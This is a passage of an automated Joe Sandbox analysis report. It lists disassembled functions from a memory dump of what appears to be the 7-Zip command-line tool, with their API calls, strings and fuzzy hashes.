                              Function 00FA0CAC Relevance: 7.5, APIs: 6, Instructions: 38COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 08845d820ad8a366d5d4bd19e7b6d5ca9f480e4a13f5d0935fdc3c213a3a5d05
                              • Instruction ID: 3bab221eff1ef052055517a0ef59857c93ed0f02febce64adc1f2d2962bc9186
                              • Opcode Fuzzy Hash: 08845d820ad8a366d5d4bd19e7b6d5ca9f480e4a13f5d0935fdc3c213a3a5d05
                              • Instruction Fuzzy Hash: F8F0685370168989CB90FE66EC9116C27209F96BE8B5C8532FF0D1F754DE29CC629350
                              Function 00FA0D24 Relevance: 7.5, APIs: 6, Instructions: 38COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 75a5f18dca9dfb400c00d5047afe98c59e73a89a94cd2149e7029f224defeac9
                              • Instruction ID: c648789f5d11b7a7d5af942cbe44adbafd5f327f8b45c830f14132aaa9d3e1a7
                              • Opcode Fuzzy Hash: 75a5f18dca9dfb400c00d5047afe98c59e73a89a94cd2149e7029f224defeac9
                              • Instruction Fuzzy Hash: 9FF0C893B01A8489CB90BE66EC8115C23109F56BE9F4C8132BF0D1F744DF29CCA39350
                              Function 00F82DE4 Relevance: 7.5, APIs: 6, Instructions: 19COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 6ba20e383c5cd0500879b364b40f6d610812b00baf9de314c07cc055ac161e38
                              • Instruction ID: 2727697fe5054046945cc9d6a193c7120fafff2bd235c106023bda7f32056eca
                              • Opcode Fuzzy Hash: 6ba20e383c5cd0500879b364b40f6d610812b00baf9de314c07cc055ac161e38
                              • Instruction Fuzzy Hash: 3CE0285261050981CBD4FF76DC9102C3324E7D5F44B5450139E1D9F215CD1ECC63A391
                              Function 00FCC088 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FCC0F9
                              • fputs.MSVCRT ref: 00FCC137
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$memset
                              • String ID: : Removing files after including to archive$Removing
                              • API String ID: 3543874852-1218467041
                              • Opcode ID: a4a5c5f2e2ed0fc3699a4b4d5ab354da92a1930d9a75827637bdf74ba3ea48d2
                              • Instruction ID: 56b4c40604c58af97d6939c55a4ece609ed73aa0b0ca222fde2943daefd12cc1
                              • Opcode Fuzzy Hash: a4a5c5f2e2ed0fc3699a4b4d5ab354da92a1930d9a75827637bdf74ba3ea48d2
                              • Instruction Fuzzy Hash: 07319E62600A8292DE78EB35E8567ED7361E740758F48C427DB9F46162DF7CD4CAE300
                              Function 00F76D34 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78windowCOMMON
                              Download Yara Rule
                              APIs
                              • FormatMessageW.KERNEL32 ref: 00F76DAB
                              • LocalFree.KERNEL32 ref: 00F76DCD
                                • Part of subcall function 00F738A8: free.MSVCRT ref: 00F738E0
                              Strings
                              • Error #, xrefs: 00F76E49
                              • Internal Error: The failure in hardware (RAM or CPU), OS or program, xrefs: 00F76D6F
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: FormatFreeLocalMessagefree
                              • String ID: Error #$Internal Error: The failure in hardware (RAM or CPU), OS or program
                              • API String ID: 1548054572-2710258398
                              • Opcode ID: 41c7a38d39f7a366ebb840e5a8ecbd33c65445bff81c0bcaf35595811ff3ce38
                              • Instruction ID: 1ac192363fb3eca9e2e91f06d4941f29e454979ef1c86c23c6eb817170d63eda
                              • Opcode Fuzzy Hash: 41c7a38d39f7a366ebb840e5a8ecbd33c65445bff81c0bcaf35595811ff3ce38
                              • Instruction Fuzzy Hash: 5D31C036714A8196CB70DF15E44075D73A2E7C5BA0F548227DA8D87754DB7CC188EB22
                              Function 00FCC7CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FCC84D
                              • fputs.MSVCRT ref: 00FCC85D
                              • free.MSVCRT ref: 00FCC8A3
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$freememset
                              • String ID: :
                              • API String ID: 2276422817-3653984579
                              • Opcode ID: bf51fc24a28999f906349a3871acf52267a47cb870f45fcd5bfd45cafda63ced
                              • Instruction ID: 157484353b9afb286a2e37ae8a6a90ec80593e575a898beb45e6e72e14b6d5c3
                              • Opcode Fuzzy Hash: bf51fc24a28999f906349a3871acf52267a47cb870f45fcd5bfd45cafda63ced
                              • Instruction Fuzzy Hash: 6F11E41270064282CA68EB25DD5176D7321FBC4BB4F488636DE1E43796DF3CC495A300
                              Function 00FCBB30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FCBBB7
                              • free.MSVCRT ref: 00FCBBD6
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$freememset
                              • String ID: ERROR: $WARNING:
                              • API String ID: 2276422817-2114518728
                              • Opcode ID: c9337f9c4ca69ffa5780f91b31773c4e6559dbf201a4c98eb23e454be8c4651a
                              • Instruction ID: 33a3816cb49beca5b47cc5cec96b64f04a982b6d26de41866d1e42842a5528ac
                              • Opcode Fuzzy Hash: c9337f9c4ca69ffa5780f91b31773c4e6559dbf201a4c98eb23e454be8c4651a
                              • Instruction Fuzzy Hash: 6011E912701A4141DA68EF26ED52B7D3311E785BE0F4882379E2F07392DF2CC885E301
                              Function 00FC08D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00FC08ED
                              • fputs.MSVCRT ref: 00FC0955
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              • LeaveCriticalSection.KERNEL32 ref: 00FC0993
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CriticalSectionfputs$EnterLeavememset
                              • String ID: ERROR:
                              • API String ID: 2331179553-977468659
                              • Opcode ID: 466621b1c3de3273fbd47d703df1a077b0369dc6d621ab67cd3b5968bca88ceb
                              • Instruction ID: 587e72ffa1e02fa7fb8c3ff7117f331f23984eff0281332840b52a3b676bef66
                              • Opcode Fuzzy Hash: 466621b1c3de3273fbd47d703df1a077b0369dc6d621ab67cd3b5968bca88ceb
                              • Instruction Fuzzy Hash: 3F115A3631094381EB19DF25D951BBC2332EBD4FA5F1881369E1E4BB56CF38888AE310
                              Function 00F72BA0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID: a$z
                              • API String ID: 0-4151050625
                              • Opcode ID: 6ae0dc97e00bf20445782d7632547404e64b5bc7cdb6d7c8bcc16cb23f98946c
                              • Instruction ID: 34d724d187a3e394de3bd4972f9f05c245f47f88c43af506b327fa8ff24d773a
                              • Opcode Fuzzy Hash: 6ae0dc97e00bf20445782d7632547404e64b5bc7cdb6d7c8bcc16cb23f98946c
                              • Instruction Fuzzy Hash: 41016942F4905685EBB67B1AA9443F8A752A765BB6F8DC1338F1E07311EA184AD1F303
                              Function 00F7BDA4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: RtlGetVersion$ntdll.dll
                              • API String ID: 1646373207-1489217083
                              • Opcode ID: 3270b66177bae0e4f37cbf032a5b585ff5bf23b06b314f74da539d27339d0187
                              • Instruction ID: d21f93b1ce97b5419d58471554fbcb40fc872f0a3252ad7237e510cb36899c01
                              • Opcode Fuzzy Hash: 3270b66177bae0e4f37cbf032a5b585ff5bf23b06b314f74da539d27339d0187
                              • Instruction Fuzzy Hash: B7F06232A0510596EF30EB20F4443B923E1E79A329F544837D70E42750DF7CC955EE02
                              Function 00FCBD78 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FCBD9B
                              • fputs.MSVCRT ref: 00FCBDC8
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free
                              • String ID: Open archive: $StdOut
                              • API String ID: 3873070119-2401103298
                              • Opcode ID: 4e91ddbeab93c2d72459f93409c67ee03fab2be40fed6645fabcfa7b4743dad9
                              • Instruction ID: 441b5b51bea284da26a58db71d2d52c90d61b3fb5f8dbafe37eb6587cc4a9a7d
                              • Opcode Fuzzy Hash: 4e91ddbeab93c2d72459f93409c67ee03fab2be40fed6645fabcfa7b4743dad9
                              • Instruction Fuzzy Hash: F7F089A530098282CF54DF25DA8576C2322EB44FD4F18D4338D0E4B718DF18C4C9D310
                              Function 00FC1B70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$fputc
                              • String ID: $:
                              • API String ID: 1185151155-4041779174
                              • Opcode ID: ec6c24268499b5c22fe0a13979c60313f5df506e5d120099ed6475117c24e543
                              • Instruction ID: 6c8ea777bca9d69934d9dfa0b1b3ba7d996f759236b9a7f9b11aa800946f3a9a
                              • Opcode Fuzzy Hash: ec6c24268499b5c22fe0a13979c60313f5df506e5d120099ed6475117c24e543
                              • Instruction Fuzzy Hash: 71E06D9630478082CB25DB2AE94436D6322EB99FDCF488123DE8E07B5ADE2CC148CB11
                              Function 00FCD8C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: GetLargePageMinimum$kernel32.dll
                              • API String ID: 1646373207-2515562745
                              • Opcode ID: 8e9a9dab5b7f2e19df094af4520333db7a13ff35ee5bd9949f6b110a8c73edde
                              • Instruction ID: 1a65f401ac3793e68eb980c9f3afe96bf51d12f283ac2cb924029f62feb20035
                              • Opcode Fuzzy Hash: 8e9a9dab5b7f2e19df094af4520333db7a13ff35ee5bd9949f6b110a8c73edde
                              • Instruction Fuzzy Hash: FFE09A25752B07C1EE25DB51BCA53382365BB88751F84053A840E82B60EF3CD505E301
                              Function 00F7B97C Relevance: 6.4, APIs: 5, Instructions: 140COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F73730: free.MSVCRT ref: 00F7376A
                                • Part of subcall function 00F73730: memmove.MSVCRT(00000000,?,?,00000000,00F710B0), ref: 00F73785
                              • free.MSVCRT ref: 00F7B9EE
                              • free.MSVCRT ref: 00F7BB01
                              • free.MSVCRT ref: 00F7BB4B
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: f6a79e1e2e53c5d128062005ef24517dc4d8bc9b2001797f74a16cc3843fae74
                              • Instruction ID: 7a1053c113f5bf096a16ebe843f588d0b05d4dfb577e9b33f6f0393017142203
                              • Opcode Fuzzy Hash: f6a79e1e2e53c5d128062005ef24517dc4d8bc9b2001797f74a16cc3843fae74
                              • Instruction Fuzzy Hash: 3141B96321854095CA20FF19D49016EB721EBD6790B449123FE9F47629DF3CC946FB43
                              Function 00F8A024 Relevance: 6.4, APIs: 5, Instructions: 132COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 73b97f750171db4c521c0c1b0c7efb8e366ee69d85245091a69d9f14588f1804
                              • Instruction ID: 9e4c5b1b94121ab73be8db29cee2ac75ade423a24d31a89c2d304d2f0ec85caf
                              • Opcode Fuzzy Hash: 73b97f750171db4c521c0c1b0c7efb8e366ee69d85245091a69d9f14588f1804
                              • Instruction Fuzzy Hash: FD411723715B8056EB60EE22D9502AD7360F785BF4F089212EE9E0BB54DF3CC951EB02
                              Function 00F7A954 Relevance: 6.3, APIs: 5, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ErrorLastfree
                              • String ID:
                              • API String ID: 2167247754-0
                              • Opcode ID: 9e5ac0819ccd73d860c5bb0ac35cb87d2fcfabdfe1c81ef86ca79644d4d74276
                              • Instruction ID: 3b5299c5148543ddd311d5e2c335710a3442519f2924128e9ce9c8213d52782e
                              • Opcode Fuzzy Hash: 9e5ac0819ccd73d860c5bb0ac35cb87d2fcfabdfe1c81ef86ca79644d4d74276
                              • Instruction Fuzzy Hash: D931E71321454095DA70AB24ED5176E7320E7D53F4F418313BAAE87AA5DE2CC886F703
                              Function 00F99D70 Relevance: 6.3, APIs: 5, Instructions: 84COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ErrorLastmemmove
                              • String ID:
                              • API String ID: 3561842085-0
                              • Opcode ID: 91663e74d70eaacb513d60a4784cfbb330a645ba5be1881762ea54d7b565f1b6
                              • Instruction ID: 2fc56864a3343fa4c9dd3a5dc8d19230bc5fa254b21f47f89de866b32308caea
                              • Opcode Fuzzy Hash: 91663e74d70eaacb513d60a4784cfbb330a645ba5be1881762ea54d7b565f1b6
                              • Instruction Fuzzy Hash: 9021D12220868250EF60EB25EC403AA7320EBC17F0F444226EEAD475A5DE6CC94AE711
                              Function 00FA1548 Relevance: 6.3, APIs: 5, Instructions: 62COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              • Opcode ID: a891cb515865a68be5e6a03bd8abd97aaf33105ab184db28d6fece49421a2b41
                              • Instruction ID: 32ebc1d049df550806402fca9db032630698602fa4056f2947d9ada2b8f316f9
                              • Opcode Fuzzy Hash: a891cb515865a68be5e6a03bd8abd97aaf33105ab184db28d6fece49421a2b41
                              • Instruction Fuzzy Hash: C71101E2B0470285EB249B629D413B83326A766FD4F8D4022CE064B704FF38C555E304
                              Function 00FB2FE8 Relevance: 6.3, APIs: 5, Instructions: 62COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              • Opcode ID: 5001601b6dd0e9dc131b0f3698d5251bc58e879868400dfb826f7ca5e64397d1
                              • Instruction ID: 426253935b7c790a152380927ae6560f9921378bc2db6ae07f68075d47ee5537
                              • Opcode Fuzzy Hash: 5001601b6dd0e9dc131b0f3698d5251bc58e879868400dfb826f7ca5e64397d1
                              • Instruction Fuzzy Hash: 7C11CEA238571281EB24EB27DD417B833229B15FD8F8840268E094B309FF78CA55E300
                              Function 00F7422C Relevance: 6.3, APIs: 5, Instructions: 61COMMON
                              Download Yara Rule
                              APIs
                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F74272
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F7427E
                              • _CxxThrowException.MSVCRT ref: 00F7429C
                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F742C8
                              • _CxxThrowException.MSVCRT ref: 00F742E6
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                              • String ID:
                              • API String ID: 2296236218-0
